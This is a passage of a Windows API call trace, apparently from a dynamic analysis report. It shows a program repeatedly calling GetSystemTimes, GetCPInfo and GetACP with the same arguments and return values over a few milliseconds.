lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.477] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.477] GetACP () returned 0x4e4 [0043.477] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.477] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.477] GetACP () returned 0x4e4 [0043.477] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.477] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.477] GetACP () returned 0x4e4 [0043.477] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.477] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.477] GetACP () returned 0x4e4 [0043.477] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.477] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.477] GetACP () returned 0x4e4 [0043.477] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.477] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.478] GetACP () returned 0x4e4 [0043.478] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.478] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.478] GetACP () returned 0x4e4 [0043.478] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.478] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.478] GetACP () returned 0x4e4 [0043.478] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.478] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.478] GetACP () returned 0x4e4 [0043.478] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.478] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.478] GetACP () returned 0x4e4 [0043.478] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.478] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.478] GetACP () returned 0x4e4 [0043.478] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.478] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.478] GetACP () returned 0x4e4 [0043.478] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.478] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.478] GetACP () returned 0x4e4 [0043.478] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.478] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.478] GetACP () returned 0x4e4 [0043.478] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.478] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.478] GetACP () returned 0x4e4 [0043.479] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.479] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.479] GetACP () returned 0x4e4 [0043.479] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.479] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.479] GetACP () returned 0x4e4 [0043.479] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.479] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.479] GetACP () returned 0x4e4 [0043.479] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.479] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.479] GetACP () returned 0x4e4 [0043.479] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.479] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.479] GetACP () returned 0x4e4 [0043.479] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.479] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.479] GetACP () returned 0x4e4 [0043.479] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.479] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.479] GetACP () returned 0x4e4 [0043.479] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.479] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.479] GetACP () returned 0x4e4 [0043.479] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.479] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.479] GetACP () returned 0x4e4 [0043.480] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.480] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.480] GetACP () returned 0x4e4 [0043.480] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.480] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.480] GetACP () returned 0x4e4 [0043.480] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.480] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.480] GetACP () returned 0x4e4 [0043.480] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.480] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.480] GetACP () returned 0x4e4 [0043.480] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.480] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.480] GetACP () returned 0x4e4 [0043.480] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.480] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.480] GetACP () returned 0x4e4 [0043.480] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.480] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.480] GetACP () returned 0x4e4 [0043.480] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.480] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.480] GetACP () returned 0x4e4 [0043.480] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.480] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.480] GetACP () returned 0x4e4 [0043.481] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.481] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.481] GetACP () returned 0x4e4 [0043.481] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.481] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.481] GetACP () returned 0x4e4 [0043.481] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.481] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.481] GetACP () returned 0x4e4 [0043.481] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.481] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.481] GetACP () returned 0x4e4 [0043.481] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.481] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.481] GetACP () returned 0x4e4 [0043.481] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.481] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.481] GetACP () returned 0x4e4 [0043.481] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.481] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.481] GetACP () returned 0x4e4 [0043.481] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.481] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.481] GetACP () returned 0x4e4 [0043.481] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.481] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.481] GetACP () returned 0x4e4 [0043.481] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.482] GetACP () returned 0x4e4 [0043.482] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.482] GetACP () returned 0x4e4 [0043.482] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.482] GetACP () returned 0x4e4 [0043.482] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.482] GetACP () returned 0x4e4 [0043.482] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.482] GetACP () returned 0x4e4 [0043.482] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.482] GetACP () returned 0x4e4 [0043.482] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.482] GetACP () returned 0x4e4 [0043.482] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.482] GetACP () returned 0x4e4 [0043.482] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.482] GetACP () returned 0x4e4 [0043.482] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.483] GetACP () returned 0x4e4 [0043.483] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.483] GetACP () returned 0x4e4 [0043.483] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.483] GetACP () returned 0x4e4 [0043.483] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.483] GetACP () returned 0x4e4 [0043.483] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.483] GetACP () returned 0x4e4 [0043.483] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.483] GetACP () returned 0x4e4 [0043.483] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.483] GetACP () returned 0x4e4 [0043.483] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.483] GetACP () returned 0x4e4 [0043.484] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.484] GetACP () returned 0x4e4 [0043.484] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.484] GetACP () returned 0x4e4 [0043.484] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.484] GetACP () returned 0x4e4 [0043.484] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.484] GetACP () returned 0x4e4 [0043.484] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.484] GetACP () returned 0x4e4 [0043.484] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.484] GetACP () returned 0x4e4 [0043.484] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.484] GetACP () returned 0x4e4 [0043.484] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.484] GetACP () returned 0x4e4 [0043.484] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.484] GetACP () returned 0x4e4 [0043.485] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.485] GetACP () returned 0x4e4 [0043.485] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.485] GetACP () returned 0x4e4 [0043.485] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.485] GetACP () returned 0x4e4 [0043.485] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.485] GetACP () returned 0x4e4 [0043.485] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.485] GetACP () returned 0x4e4 [0043.485] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.485] GetACP () returned 0x4e4 [0043.485] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.485] GetACP () returned 0x4e4 [0043.485] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0043.485] GetACP () returned 0x4e4 [0043.485] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0043.485] 